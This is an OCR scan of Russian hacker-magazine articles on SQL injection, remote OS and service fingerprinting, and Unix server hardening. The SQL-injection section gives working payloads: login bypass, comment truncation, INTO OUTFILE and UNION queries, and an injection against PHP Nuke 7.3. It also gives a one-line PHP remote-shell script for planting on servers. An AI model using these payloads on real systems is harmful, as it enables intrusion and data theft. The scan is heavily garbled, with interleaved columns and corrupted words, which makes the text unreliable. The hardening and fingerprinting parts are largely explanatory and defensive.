|" (без кавычек): "select * from 
userTable where login = 'KPNC' and 
password = 'fuck' or ‘I! = 1". 

Смотри: кавычка, стоящая после 
fuck, замкнула пользовательский па- 
роль, а весь последующий ввод по- 
пал в логическое выражение, навя- 
занное базе данных атакующим. Пос- 
кольку один всегда равен одному, 
запрос будет считаться выполненным 
при любом введенном пароле и SQL- 
сервер возвратит все-все-все записи 
из таблицы (в том числе и не относя- 
щиеся к логину КРМС)! 

Рассмотрим другой пример: "SELECT 
* FROM userTable WHERE 
msg='$msg' AND ID=669". 

Здесь msg - номер сообщения, 
извлекаемого из базы, а Ш - иден- 
тификатор пользователя, автомати- 
чески подставляемый скриптом в 
строку запроса и непосредственно 
не связанный с пользовательским 
вводом. Константная переменная ис- 
пользована по соображениям наг- 
лядности, в конечном скрипте будет, 
скорее всего, использована 
конструкция типа: ID='Suser|D'. Что- 
бы получить доступ к остальным по- 
лям базы (а не только к тем, чей ID 
равен 669), необходимо отсечь пос- 
леднее логическое условие. Это 
можно сделать, внедрив в строку 
пользовательского ввода символы 
комментария ("--" и "/*" для MS SQL 
и MySQL соответственно). Текст, 
расположенный правее символов 
комментария, игнорируется. Если 
вместо номера сообщения ввести "1" 
AND 10=666 --", строка запроса 
примет следующий Bug: "SELECT * 
FROM userTable WHERE т$9=\' 
and ID= 666 --' AND ID=669". 

Kak следствие, атакующий получит 
возможность самостоятельно фор- 


мировать ID, читая сообщения, пред- » 


Размещать 
сервер базы 
данных на 
одном узле 
с Web-cep- 
вером кате- 
горически 
недопусти- 
мо не толь- 
ко по тех- 
ническим, 
но и по 
юридичес- 
ким сообра- 
жениям. 


Сервер БД, 
как и любой 
другой сер- 
вер, подвер- 
жен ошиб- 
кам проек- 
тирования, 
среди кото- 
рых доми- 
нируют пе- 
реполняю- 
щиеся бу- 
фера. 


Многие сер- 
вера хранят 
информа- 
ЦИЮ 06 ав- 
торизации в 
кукисах 
(cookie), на- 
ходящихся 
на машинах 
удаленных 
пользовате- 
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назначенные совсем для других ОПРЕДЕЛЕНИЕ НАЛИЧИЯ SOL 
пользователеи. 


Причем одним лишь видоизменени- _ 

ем полей SELECT'a дело не огранива- =... —ы=ыы_ 
[J рей: — i 
ется, и существует угроза прорыва за uw «4 a 
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его пределы. Некоторые SQL-cepBepa ыы Бы в 4 ее 
поддерживают возможность задания 
нескольких команд в одной строке, 
разделяя их знаком ";", что позволя- 
ет атакующему выполнить любые 
$ОЕ-команцы, какие ему только заб- 
лагорассудится. Например, последо- 


*NIX 
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ляет всю userTable! те мы м ©  ывына 
= Te - a Te EB TE TH ele 


Еще атакующий может сохранять 
часть таблицы в файл, подсовывая 
базе данных запрос типа "SELECT * 
FROM userTable INTO OUTFILE inte Ss 


"FileName". Соответствующий ему Сервер MySQL, прослушивающий 3306 порт 


URL уязвимого скрипта может выгля- 


и. 


Fr И. О тт 


www.victim.com/admin.php?op=login& 1433 Microsoft-SQL-Server 

pwd=123&aid=Admin'%20INTO%200U 1434 Microsoft-SQL-Monitor 

TFILE%20'/path_to_file/pwd.txt, rge 1498 Watcom-SQL 

path_to_file - путь к файлу pwd.txt, в 1525 ORACLE 

который будет записан админовский 1527 ORACLE 

pte eee Poe 1571 Oracle Remote Data Base 
: : 3306 MySQL 


размесить файл в таком месте, отку- 
да его потом будет можно беспрепят- 
ственно утянуть, например, в одном 

ПИТИИ 
из публичных WWW-katanoros. Тогда 


Порты, прослушиваемые различными серверами БД 


полный путь к файлу должен выгля- строке). Здесь tablel - имя таблицы, присутствия потенциально опасных 
деть приблизительно как: содержимое которой необходимо символов (одиночная кавычка, точка 
и../../../..Л\ММАИтпуИе 4х4" (точная вывести на экран. с запятой, двойное тире, а для MySQL 
форма запроса зависит от конфигу- Атаки подобного типа называются еще и символ звездочки) включая и 
рации сервера). Но это еще только $ОЁ-инъекциями (SQL-injection) и яв- их шестнадцатеричные эквиваленты, 
цветочки! Возможность создания ляются частным случаем атак, осно- задаваемые через префикс "%", а 

Почти 30% файлов на сервере позволяет засы- ванных на ошибках фильтрации и ин- именно: %27, %2А и %ЗВ. Если хотя 

всех скрип- лать на атакуемую машину собствен- терполяции строк. Мы словно впрыс- бы одно из условий фильтрации не 

ны ные скрипты (например, скрипт, даю- киваем в форму запроса к базе дан- проверяется или проверяется не вез- 

ошибке щий удаленный shell - "<? ных собственную команду, прокалы- де (например, остаются не оторильтро- 

вая passthru(Scmd) ?>"). Естественно, вая хакерской иглой тело уязвимого ванными строки URL или cookie), в 

у максимальный размер скрипта огра- скрипта (отсюда и "инъекции"). Это не скрипте образуется дыра, через кото- 

ничен предельно допустимой длиной ошибка SQL-cepBepa (как часто при- рую его можно атаковать. 
формы пользовательского ввода, HO нято считать). Это - ошибка разра- Впрочем, сделать это будет не так 
это ограничение зачастую удается ботчиков скрипта. Грамотно спроекти- ужи просто. Необходимо иметь опыт 
обойти ручным формированием зап- рованный скрипт должен проверять программирования на Perl/PHP и 

те роса в URL или использованием пользовательский ввод на предмет знать, как может выглядеть та или 

ана а. $ОЕ-команды INSERT INTO, добавля- 

дом POST, ющей новые записи в таблицу. у 

ос | : as ПРОТИВОДЕЙСТВИЕ ВТОРЖЕНИЮ 

НЕЕ Скорректированный URL-3anpoc мо- 

тельно ху- жет быть таким: 

же, пос- Н icti 7 2id=17! 

У Пе http://www.victim.com/index.php?id=12 

редаются или таким: 

bal eh beh http://www.victim.com/index.php?id=12+u 

afaniataoe nion+select+null,null,null+from+tablel /*. 

гут быть Последний запрос работает толь- 

модифици- 

рованы из ко на MySQL версии 4.x ивыше, 

браузера. поддерживающей union (объедине- 


ние нескольких запросов в одной 


ЕЕ 5Ы Бы БЕ МЕ БЕ А БЫ К + 


Фрагмент PHP Nuke, ответственный за формирование зап- 
АВЕ MTT 
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МНЕНИЕ ЭКСПЕРТА 


Ш Никита Кислицин, редактор рубрики "Взлом" журнала "Хакер": 


«Базы данных всегда были лакомым кусочком для хакеров. И в 
этом нет ничего удивительного: в них можно найти миллионы номе- 
ров кредитных карт, пароли к сетевым ресурсам, конфиденциаль- 
ную информацию и даже планы террористических организаций по 
захвату цивилизованного мира. Увы, порой администраторы сете- 
вых баз данных не уделяют должного внимания безопасности, час- 
то их подводят и программисты, разрабатывающие программные 
интерфейсы. Следует знать, что в более чем половине случаев 
взлома 5ОЁ-серверов используется технология 5ОЁ-иньекции в 
разных ее проявлениях, то есть эти проблемы лежат на совести 
\М/еБ-программистов. Однако бывают и вовсе комические случаи. За 
примером далеко ходить не надо. «Хакер» недавно писал о взломе 
cygwin.com и экспроприации оттуда вкуснейшей базы данных. Вы- 
сокопрофессиональный админ этого сервера почему-то решил не 
указывать вообще никакого пароля к администраторскому аккаун- 
ту MySQL, что и позволило нашему партизану при помощи детско- 
го бага в скрипте совершить столь дерзкую вылазку». 


иная форма запроса и как чаще все- 
го именуются поля таблицы, в про- 
тивном случае интерполяция ни к 
чему не приведет. Непосредствен- 
ной возможности определения имен 
полей и таблиц у хакера нет, и ему 
приходится действовать методом 
слепого перебора (blinding). 

Однако большинство администрато- 
ров и Web-macTepoB слишком ленивы, 
чтобы разрабатывать все необходи- 
мые им скрипты самостоятельно, и ча- 
ще они используют готовые решения, 
исходные тексты которых свободно 
доступны в сети. Причем, большин- 
ство этих скриптов дырявы как ведро 
без дна. Взять, к примеру, тот же РНР 
Nuke, в котором обнаруживаются все 
новые и новые уязвимости. 

Приблизительная стратегия поиска 
дыр выглядит так. Скачиваем исходные 
тексты PHP: Nuke (или любой другой 
портальной системы), устанавливаем 
их на свой локальный компьютер, про- 
ходимся глобальным поиском по всем 
файлам, откладывая в сторонку все те, 
что обращаются к базе данных (вызов 
типа mysql_query/mysql_db_query или 
типа того). Далее прокручиваем курсор 
вверх и смотрим - где-то поблизости 
должна быть расположена строка зап- 
роса к базе (например: Squery = 
"SELECT user_email, user_id FROM 
S{prefix}_users WHERE user_id = 'Scook- 
ie[O]'"). Определяем имена перемен- 
ных, подставляемых в базу, находим 
код, ответственный за передачу пара- 
метров пользовательского ввода и 
анализируем условия фильтрации. 


В качестве наглядного примера рас- 
смотрим одну из уязвимостей РНР 
Nuke 7.3, связанную с обработкой но- 
востей. Соответствующий ей URL 
выглядит так: 
modules.php?name=News&file=cate- 
gories&op=newindex&catid=1. По ero 
внешнему виду можно предполо- 
жить, что значение Catid передается 
непосредственно в строке запроса к 
БД, и, если разработчик скрипта за- 
был о фильтрации, у нас появляется 
возможность модифицировать зап- 
рос по своему усмотрению. Для про- 
верки этого предположения заменим 
сана с 1, допустим, на 669. Сервер не- 
медленно отобразит в ответ пустой 
экран. Теперь добавим к нашему URL 
следующую конструкцию ""ог1Ч=1" 
(полностью он будет выглядеть так: 
modules.php?name=NewsS&file=cate- 
gories&op=newindex&catid=669'or'l'='1) 
. Сервер послушно отобразит все но- 
востные сообщения раздела, подтве- 
ржодая, что 5О1-инъекция сработала! 

Еще можно попытаться вызвать 
ошибку SQL, подсунув ей заведомо 
неправильный запрос (например, сим- 
вол одиночной кавычки), и тогда она 
может сообщить много интересного. От- 
сутствие ошибок еще не означает, что 
скрипт фильтрует пользовательский 
ввод: быть может, он просто перехваты- 
вает сообщения об ошибках, что явля- 
ется нормальной практикой сетевого 
программирования. Также возможна 
ситуация, когда при возникновении 
ошибки возвращается код ответа 500 
или происходит переадресация на глав- 


Команда Назначение 


CREATE TABLE создание новой таблицы 
DROP TABLE удаление существующей таблицы 
INSERT INTO добавление в таблицу поля с заданным значением 


DELETE FROM ...WHERE удаление из таблицы всех записей, отвечающих условию WHERE 


SELECT * FROM... WHERE | выборка из базы всех записей, отвечающих условию WHERE 


UPDATE... SET ... WHERE обновление всех полей базы, отвечающих условию \М НЕВЕ 


Основные команды SQL 


$0-иньекции через строку URL 


ную страницу. Подобная двусмыслен- 
ность ситуации существенно затрудня- 
ет поиск уязвимых серверов, но отнюдь 
не делает его невозможным! 

Анализ показывает, что ошибки 
фильтрации встречаются в большом 
количестве скриптов (включая ком- 
мерческие), зачастую оставаясь не- 
исправленными годами. Естественно, 
дыры в основных полях ввода дав- 
ным-давно заткнуты, а потому рассчи- 
тывать на быстрый успех уже не при- 
ходится. Запросы, передаваемые ме- 
тодом POST, протестированы значи- 
тельно хуже, поскольку передаются 
скрыто от пользователя и не могут 
быть модифицированы Henocpeg- 
ственно из браузера, отсекая армаду 
начинающих "хакеров". Между тем, 
взаимодействовать с Web-cepBepom 
можно и посредством netcat (telnet), 
формируя РО$Т-запросы вручную. 


ЗАКЛЮЧЕНИЕ 

и $ОЕ-инъекции в очередной раз 
продемонстрировали миру, что прог- 
рамм без ошибок не бывает. Однако 
не стоит переоценивать их значи- 
мость. Мавр сделал свое дело, мавр 
может удалиться. Администраторы и 
девелоперы знают об опасности, и ко- 
личество уязвимых сайтов тает с каж- 
дым GHeM. Реальную власть Hac систе- 
мой дают лишь принципиально новые 
методики атак, неизвестные широкой 
общественности. Найти их - наша с то- 
бой задача. Освободи свой разум, пе- 
решагни грань неведомого и зайди на 
сервер с той стороны, с которой на не- 
го еще никто не заходил. 


= —- 
ale) at 28 ole 
1 —- = о ды 
hy 
om coon т en бой = 
—— ой 
в вые ee | 
2 == 
j= bem eo =. 
: 

БИ ет В ра 2 x в р” 

ret 

ee 


et 
See ре побои 


р и ee 
=m 
= os 


орлы зщ, ви иены 
ee АТР с в a 


= @nb пез ви 
а ны 
— 


SS ee рные 


Пример программы, осуществляющей запрос в БД 
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ТЕХНОЛОГИЯ REMOTE FINGERPRINTING 


ограничивается. 


дея удаленно определять версию ОС или запущенного на хосте сервиса не нова. Все знают, что популярный сканер 
Vl nmap, будучи запущенным с параметром -O, пытается определить версию операционки. Известно также, что около 
года назад тот же птар научился определять и версии сервисов, запущенных на сканируемом хосте. Наша задача - 
понять технологию работы сканера, а также убедиться в том, что одним лишь птар'ом понятие fingerprinting He 


ПАКЕТНЫЕ ИГРЫ 


и Сканер nmap, запу- 


щенный с повышенной 


вербозностью (пара- 
метр -VVV), выдает при- 


мерно следующее: 


Статью 
Fyodor a, 
переведен- 
ную на рус- 
ский язык, 
можно най- 
ти по адре- 


су 
http://www. 
insecure.org 
/nmap/nmap 
-fingerprint- 
ing-article- 
ru.html. 


Многие не обращают внимания, а 
ведь в этом кажущемся мусоре и со- 
держится вся сермяжная правда об 
операционке. Это результаты восьми 
тестов для определения версии ОС; их, 
разумеется, намного больше, но мы 
рассмотрим только стандартные. Ник- 
то не сможет рассказать о них более 


От сканиро- подробно, чем Fyodor в своей статье, 


вания 

nmap'om которая была опубликована в езине 
могут по- Phrack #54 в далеком 1998 году. 

мочь меха- n i _ 
ИЕ ервая строчка - просто информа 
OpenBSD ЦИЯ О CUCTeMe, на которой работает 
РЕ, норма- у 
ее nmap, версия сканера, оси, на которой 
трафик. он собран, и т.п. 


Далее идет набор из семи тестов (T1- 
Т7), каждый из которых заключается 
в посылке специально сформирован- 
ного ТСР-пакета на целевой хост и 


ЕЕ SCEE) изучении ответа. 


сервиса мо- Итак, первый тест - это отправка па- 
и кета с установленным Conarom SYN на 
сменой бан- открытый порт. Это штатный запрос, и 
неров, текс- система обязана на него прореагиро- 
товых ком- O ( 6 ) 7 
ментариев и вать. Ответ (в скобках) интерпретиру 
nedos оши- ется следующим образом. Resp=Y оз- 
ок. 


начает, что от системы был получен 
ответ. DF=Y означает, что бит Don't 
Fragment, выставленный в отправлен- 
ном пакете, сохранился. W - размер 
окна (Window Size) удаленной систе- 
мы. АСК - значение Acknowledge 
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Number в ответном пакете, S++ гово- 
рит о том, что оно было равно полу- 
ченному ISN (Initial Sequence Number), 
увеличенному Ha 1. Flags - срлаги в от- 
ветном пакете (в нашем случае это 
SYN+ACK). Ops - ТСР-опции (времен- 
ная метка, Мах Segment Size и про- 
чее), для птар важно не только их на- 
личие, но и порядок следования - 
<MSS><NOOP><WindowScale><NOOP><N 
OOP>TimeStamp>. 

Второй и третий тесты (T2 и ТЗ) no- 
сылают NULL-nakeT (без единого qpna- 
га) и пакет с установленными Cpnara- 
ми SYN, FIN, PSH и УКС на открытый 
порт. Как видно, система не ответила 
на эти запросы (Resp=N). 

T4 - отправка на открытый порт па- 
кета с установленным срлагом АСК. 
По стандарту, описанному в докумен- 
тах RFC, система должна ответить 
В5Т-пакетом, так как отправляемое 
сканером "подтверждение" 
(Acknowledgment) не связано ни с од- 
ним сеансом. Ответ получен (Кезр=У), 
бит Don't Fragment выставлен, размер 
окна - О, из TCP-cpnaroB установлен 
только RST (Reset connection), чего и 


следовало ожидать. 
Тесты 5, 6 и 7 - также из серии "не- 

нормальных". Пятый тест (Т5) отправ- 

ляет пакет с conarom SYN (но без АСК) 


на закрытый порт машины. Шестой - 
то же самое, только теперь вместо 
SYN установлен АСК. Седьмой - отп- 
равка пакета с выставленными срлага- 
ми FIN, PSH, УКС все на TOT же закры- 
тый порт. Наконец, последний тест 
(PU) - отправка {СМР-сообщения Port 
Unreachable на закрытый порт yga- 
ленной машины. 

В четырех последних случаях ответ 
от хоста не был получен, но, так как 
ОС все равно опознана как FreeBSD, 
можно сделать вывод, что админ 
включил tcp & udp blackholes (sysctl -w 
net.inet.tcp.blackhole=2, sysctl -w 
net.inet.udp.blackhole=1), метод, при ко- 
тором FreeBSD старательно игнориру- 
ет провокации ее неправильными па- 
кетами. Догадка верная, ведь админ - 
я ;). Кстати, помни, что несанкциони- 
рованное сканирование часто ‹рор- 
мально считается попыткой проник- 
новения. 


БАННЕРЫ 

и Самый простой способ fingerprint- 
ing, не требующий никаких нестанда- 
ртных инструментов, - это сбор банне- 
ров (banner grabbing). Сервисы (www, 
ftp, smtp, pop3) готовы рассказать о 
себе все в ответ на простое подклю- 
чение телнетом: 


i вое № = 


[(2:00)(258.29%)(p2):~ ] telnet www.berke- 
ley.edu 80 
Trying 169.229.131.109... 
Connected to arachne.berkeley.edu. 
Escape character is "^]'. 
HEAD / HTTP/1.0 


HTTP/1.1 403 Forbidden 

Date: Tue, 24 Aug 2004 22:04:03 GMT 

Server: Stronghold/3.0 Apache/1.3.22 
RedHat/3017c (Unix) PHP/4.3.3 mod_ss|/2.8.7 
OpenSSL/0.9.6 mod_perl/1.25 

Connection: close 

Content-Type: text/html; charset=iso- 
8859-1 


Однако многие сервисы позволяют 
штатным образом сменить баннер, так 
что данный метод нельзя назвать на- 
дежным. К тому же, далеко не все сер- 
висы позволяют вести диалог в по- 
добном plain-text режиме. И если даже 
nmap очень часто считает достаточ- 
ным запросить баннер, греша точным 
определением FTP или DNS-cepBepa, 
то как же, например, популярный ска- 
Hep XSpider (www.ptsecurity.ru) точно 
отличает Postfix от Sendmal, a vsftpd 
от proftpd? 

Дело в том, что в документах RFC, 
описывающих поведение серверов, 
есть указания лишь по кодам выдава- 
емых в ответ на запросы клиентов 
ошибок, но не накладывается никако- 
го ограничения на текстовую инфор- 
мационную составляющую. Так, на 
одну и ту же неверную команду 
Postfix ответит 500 Error: bad syntax, 
Torga Kak Sendmail - 500 5.5.1 
Command unrecognized: 
"COMMAND_YOU_TYPE". Помучив 
сервер запросами и собрав базу 
возвращенных кодов, можно с доста- 
точной точностью определить версию 
сервиса. 

Но иногда все бывает еще проще, и 
вместе с сервисом становится извест- 
на версия ОС. Особенно этим грешат 
FTP-cepBepa: 


[(3:51)(85.32%)(р1):- ] ftp 
toxa@19X.XX.1.20X 

Connected to 19X.XX.1.20X. 

220 beast FTP server (Version 1.7.212.1 Sat 
Feb 1 01:30:15 GMT 1997) ready. 

331 Password required for toxa. 

Password: 

230 User toxa logged in. 

Remote system type is UNIX. 

Using binary mode to transfer files. 

ftp> syst 

215 UNIX Type: SUNOS 

ftp> quit 

221 Goodbye. 


Как видно, FTP-cepBep не только со- 
общил, что уже семь лет ждет экспло- 
ита, но и заодно признался, что запу- 
щен на солярке. 

Для сервисов, текстовый диалог с 
которыми невозможен, (например, 
DNS-cepBep) применяется та же техно- 
логия: на сервер посылаются невер- 


ные запросы и анализируются ответ- 
ные пакеты. Просто реализация тако- 
го анализа немного сложнее. 


ПАССИВНЫЙ FINGERPRINTING 

и Как насчет того, чтобы опреде- 
лить версию сервиса, не послав на 
целевой хост ни единого пакета? На 
ум сразу же приходят банальный сни- 
qpep на пути до хоста и дальнейший 
анализ перехваченных пакетов. Такие 
технологии применяются уже давно 
(http://project.honeynet.org/papers/finger/) и 
работают по тому же принципу, что и 
nmap (анализируются поля в заголов- 
ках пакета). 

Для $МТР-серверов существуют ме- 
тоды, не требующие ничего, кроме од- 
ного письма, прошедшего через целе- 
вой сервер. Многие сервера вставля- 
ют в письма красноречивые рабочие 
заголовки: 


Received: from ххх@ххх.ги Бу 
тегсигу.хххххх.ги by uid 0 with qmail-scan- 
ner-1.22 

(clamscan: 0.75. spamassassin: 2.63. 
Clear:RC:0(xx3.1xx.8x.14xx):SA:0(0.0/7.0): 


По ним мы сразу определяем, что Ha 
сервере крутится qmail, сдобренный 
солянкой из qmail-scanner и 
SpamAssassin. 

Есть элегантный способ, описанный 
российской есигКу-группой UkR 
Security Team (http://www.securitylab.ru/ 
46232.him|). Он основан Ha анализе ID- 
тега в заголовке письма. Kak и в слу- 
чае с кодом ошибки, RFC He наклады- 
вает никаких ограничений на алго- 
ритм генерации ID и каждый вендор 
выбирает его по своему усмотрению. 
Составив базу отпечатков тегов раз- 
личных почтовых серверов, можно 
точно отличить тот же Postfix oT Exim, 
не послав жертве ни одного пакета! 


ПРОТИВОДЕЙСТВИЕ 

и Разумеется, существует множест- 
во разных способов защиты от finger- 
printing. От сканирования птар'ом мо- 
гут помочь механизмы в OpenBSD PF 
(block from any os ММАР, scrub in all), 
как просто нормализующие трасрик (a 
значит, маскирующие "особенности" 
систем, этот трафик генерирующих), 
так и определяющие сканирование и 
заставляющие птар выдавать каж- 
дый раз разную чепуху. Сильно зат- 
рудняют анализ уже упомянутые 
мной blackholes Bo FreeBSD. Ведь, по 
сути, из всех тестов сканера только 
один эмулирует "нормальный" сеанс 
(SYN-nakeT на открытый порт), все ос- 
тальное - ошибочные пакеты, приз- 
ванные исследовать реакцию систе- 
мы на подобную "провокацию". Соот- 
ветственно, нужно сделать систему 
как можно более "молчаливой". 

Для Linux имеется проект IP 
Personality (http://ippersonality. 
sourceforge.net/) - патч к ядру, изменяю- 
щий поведение сетевого стека и поз- 
воляющий замаскировать систему 


под все, что не заблагорассудится, 
хоть Nog AIX, хоть под приставку 
ХБох. 

Анализ типа сервиса может быть 
затруднен сменой баннеров, тексто- 
вых комментариев кодов ошибок. Ник- 
то не мешает тебе залезть в сорцы 
любимого SMTP-cepBepa и ручками по- 
менять алгоритм генерации !О-тега :). 


МОРАЛЬ СЕЙ БАСНИ 

и Fingerprinting - чертовски полез- 
ная для взломщика технология, одна- 
ко она служит не для атаки на сверх- 
защищенные системы, а является 
способом определения уязвимой ма- 
шины в заданном диапазоне адресов. 
Не даром различные проявления этой 
технологии можно встретить в автору- 
терах, автоэксплоитах или в обычных 
(но надо признать, не очень простых) 
сканерах безопасности. 


Технология 
remote fin- 
gerprinting 
хорошо за- 
рекомендо- 
вала себя 
при произ- 
водстве ав- 
торуте- 
ров/автоэк- 
сплоитов. 
Подобным 
программам 
очень по- 
лезно быва- 
ет сначала 
проверить 
версию сер- 
виса или 
ОС, ауж 
потом при- 
менять 
эксплоит. 


‘живет nmap 
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ОСНОВНЫЕ МЕТОДЫ ЗАЩИТЫ *NIX-CACTEM 


сем давно понятно, что фраза "*тх - безопасная ОС" по своей сути 
В некорректна. *nix, если под этим понимать дизайн, реализацию ядра ОС и 
базовую ее начинку (утилиты), лишь предоставляет отличные предпосылки 
для построения на своей базе защищенной серверной системы. Но на одном 
ядре и прикладных утилитах сервер не построишь, нужны сервисы, и 
безопасность их напрямую не связана с безопасностью операционки. 


омнишь известные слова: 
"Безопасность - это не 


продукт, а процесс"? Так вот, 

безопасность как процесс - не 
свойство системы, а свойство 
взаимодействия системы и админа, который 

ее настраивает. 

Мы рассмотрим типичный сценарий уста- 
новки, настройки и сопровождения сервера с 
точки зрения есигИу-параноиков. Мне не хо- 
телось бы давать разрозненные советы из 
серии "хозяйке на заметку", поэтому мы 
пройдем по шагам все этапы от установки ОС 
go запуска сервисов, обращая внимание на 
важные моменты. Я не буду предлагать 
здесь детальное руководство по настройке 
каждого сервиса, а лишь дам общие советы, 
которые нужно иметь в виду. По этой же при- 
чине я не завязываюсь на конкретную ОС - 
кто-то любит Linux, кто-то FreeBSD, а кто-то 
по долгу службы обхаживает Solaris. Замеча- 
ния по определенной ОС, если таковые 
встретятся, будут даваться по ходу. 


СПАСИТЕЛЬНЫЕ ФЛАГИ 

Веселье начинается уже при разметке 
винчестера на партиции при установке сис- 
темы. В Мпих-мире как-то не принято обра- 
щать на это серьезное внимание, и один 
большой корневой раздел (/) на всю систему 
там - норма. Иногда, правда, выделяют 
/home. Но этого все равно мало. Не зря опыт 
поколений рекомендует иметь как минимум 
следующие разделы: 


/- корневой; 

/home - если сервер будет иметь много 
пользовательских учетных записей (хостинг, 
хранение почты, ЕТР-архив, да практически 
всегда); 

/tmp - обязательно выделяй /tmp в отдель- 
ный раздел диска; 

/var - для хранения логов, спула почты, 63- 
капов и прочего мусора; 

/usr - для исполняемых файлов, библиотек, 
исходных текстов системы. 


Пользователи BSD могут прочитать более 
подробное описание исторически сложив- 
шейся иерархии в man 7 hier, для осталь- 
ных систем существует схожий (хотя и 
спорный) документ Filesystem Hierarchy 
Standart (FHS, www.pathname.com/fhs). Ho 
какое это имеет отношение к безопасности? 
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Дело в удобстве оперирования cpnaramu 
монтирования. Любая файловая система 
позволяет указать набор флагов, с которы- 
ми будет примонтирована соответствующая 
партиция, и некоторые из них имеют непос- 
редственное отношение к безопасности 
системы. Покажу это на примере FFS (Fast 
File System), практически все остальные FS 
имеют схожие по названию срлаги (см. "man 
mount" в своей системе). 


поехес - запрещает исполнять файлы; 

nosuid - запрещает повышение привилегий 
для исполняемых suid/sgid файлов. Иными 
словами, теряется suid-6uT и программа вы- 
полняется как обычная; 

nosymfollow - запрещает использование 
символических ("мягких") ссылок; 

nodev - запрещает использование срайлов 
устройств. 


В общем случае операционке, безусловно, 
нужно иметь возможность исполнять фай- 
лы. Также в системе обязательно присут- 
ствует некоторое количество суидных прог- 
рамм, да и ссылки тоже, как правило, имеют- 
ся. Но есть ли смысл в суидных файлах, нап- 
ример, в каталоге /tmp? Часто хакеры броса- 
ют суидный /bin/sh куда-нибудь в складки 
/tmp или здесь же компилируют эксплоит, 
пока еще не имея прав рута, но надеясь их 
получить. То же касается и пользователей в 
их домашних каталогах. Вряд ли среднеста- 
тистический хостер, дающий своим клиентам 
доступ по ssh для правки\заливки контента, 
нуждается в том, чтобы эти клиенты что-то у 
себя запускали или, тем более, компилирова- 
ли и затем запускали. Поэтому очень часто 
на /tmp и /home оправданы сфрлаги nosuid, а 
нередко и поехес. В некоторых случаях они 
могут помешать, например, поехес на /tmp 
не позволит пересобрать мир (make world) 
Ha FreeBSD, но это не более чем кратковре- 
менное исключение. Нет нужды пояснять, 
что в случае одного большого раздела (/) Ta- 
кая манипуляция флагами была бы исключе- 
на. Сам же корневой раздел, включающий 
каталоги с конфигурационными файлами 
системы, базовыми бинарниками, библиоте- 
ками и ядром, вполне реально монтировать в 
режиме read-only. 

Не лишен смысла также трюк против зло- 
намеренных операций с ядром (таких, как его 
перекомпиляция и замена :)), заключающий- 


ся вот в чем. Каталог /boot, в котором 
находятся ядро, в случае BSD и моду- 
ли с конфигурационным файлом 
loader.conf, а в случае Linux - файл 
предварительной загрузки модулей 
initrd, осрормляется в виде отдельно- 
го раздела на каком-нибудь съемном 
носителе (У$В-сфлэшка), с него произ- 


тель вынимается (кладется в сейф :)). 
Подменить ядро, initrd или подсунуть 
модуль становится на порядок проб- 

лематичней. 

Помимо флагов Ha FS существуют 
дополнительные атрибуты безопас- 
ности на файлы. В BSD атрибуты выс- 
тавляются и просматриваются коман- 


sappnd - позволяет открывать файл 
только в режиме "append only"; 

schg - выставляет cpnar "immutable", 
такой файл нельзя переместить, уда- 
лить или переименовать; 

sunink - запрещает удаление срай- 
лов. 
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gon chflags(1), в Linux - chattr(1)/Isat- 
tr(1). Tak, из полезных флагов 
chfags(1) можно выделить: 


водится загрузка, а затем, после за- 
пуска системы и загрузки всех моду- 
лей, раздел размонтируется и носи- 


Эти флаги имеет право выстав- 
лять/снимать только суперпользова- 
тель. Но даже если взломщик полу- 
чил права рута, они могут спасти от 
катастросры, если помимо срлагов 
приняты другие меры безопасности. 


ВЫЖИВАЕТ СИЛЬНЕЙШИЙ 

При старте системы запускаются 
всевозможные сервисы. Какие-то сис- 
темы (OpenBSD) относятся к этому мо- 
менту очень ответственно, запрещая 
по умолчанию практически все, какие- 
то (большинство дистрибутивов 
Linux) действуют в лучших традициях 
Windows-style, запуская все, что мо- 
жет когда-либо понадобиться. "ps 
wax" ("ps -ef" в Solaris) покажет тебе, 
кто понапрасну работает, a "sockstat - 
|" (во FreeBSD) и "netstat -па | grep 
LISTEN" - кто понапрасну биндит пор- 


Ss 
a 
= 
c 
> 
- 
о 
& 
о. 
ш 
= 


Besonac- 
ность - это 
не продукт, 


а процесс. 
ты, ожидая remote эксплоита по свою 

душу. Рекомендую также и полезную 

утилиту [501 (list of open files), которая, 

сродни 6$А'шному sockstat, показыва- 

ет, какие сокеты или устройства отк- ры жене 
рыты определенными процессами. Ни- нии ядро 
чего нового здесь придумать нельзя - можно уб- 

a рать в ящик 
отключаем все, что не нужно, правкой в прямом 
rc.conf в BSD, ковырянием в И сло- 

в . ва :). 
/etc/init.d/ или /etc/rc.d/ - в Мпих и 
Solaris и т.д. Некоторые демоны по 
умолчанию слушают сетевой сокет, 
тогда как вполне могут обойтись без 
него, например, syslogd(8), который, 

бходимости принимать Еще ogne 

если нет необход р О 


логи по сети, рекомендуется запус- 
кать с флагом -ss (Secure mode). 


хи паранои- 
ков - отсле- 


живание 
Те же сервисы, что нам нужны, тоже системных 
должны иметь кредит доверия. Тут те- вызовов: 

я совершае- 
бе He Windows, и выбор сравнимых по мых прог- 
функциональности демонов имеется. раммой, и 

_ дальнейшее 
Если с системы не планируется cay их ограни= 
вать пылинки, пребывая в боевой го- чение. 


товности пропатчить, скажем, почто- 
вый сервер сразу, как только выйдет 
secuity advisory, то выбор сервисов с 
хорошей репутацией и отсутствием 
истории уязвимостей - первейшее де- 
ло. Хотя хороший админ все равно 
должен уметь быстро реагировать 
(баги находят везде), ничто не мешает 
ему снизить шанс сфорсмажора go ми- 
нимума (где-то все же их находят су- 
щественно чаще). Не буду призывать 
использовать что-либо конкретное, 
но если ты не законченный сранат ка- 
кой-пибо одной программы либо тебе 
не нужна особая функциональность 
определенного демона, то знай, что 
гарантированно не доставят тебе го- 
ловой боли из smtp-cepBepos qmail и 
postfix, из ftp-cepBepos - vsftpd, pureft- 
pd и publicfile, из DNS-cepBepos - 
djbdns, из pop3-cepBepos - все TOT же 
qmail и popa3d. Впрочем, история по- у 
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Изначаль- 
ный подс- 
чет конт- 
рольных 
сумм (МО5- 
хэшей) сис- 
темных 
утилит и 
файлов и 
дальнейшая 
их проверка 
с помощью 
утилит типа 
tripwire или 
aide может 
избавить от 
сильной го- 
ловной боли 
в дальней- 
шем. В слу- 
чае измене- 
ния файла 
утилита 
найдет рас- 
хождение в 
МО5-отпе- 
чатке и 
поднимет 
тревогу. 
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казывает, что опытные админы, как 
правило, консервативные данаты оп- 
ределенного круга программ и npeg- 
почтут патчить свое детище раз в не- 
делю, чем перейти на альтернативный 
продукт ;). 

Отдельно хочется сказать про "су- 
персерверы" inetd и xinetd. Они суще- 
ствуют для поддержки демонов, кото- 
рые не умеют запускаться в так назы- 
ваемом ${апдаопе-режиме, то есть 
принимать сетевые соединения, са- 
мостоятельно ограничивать количе- 
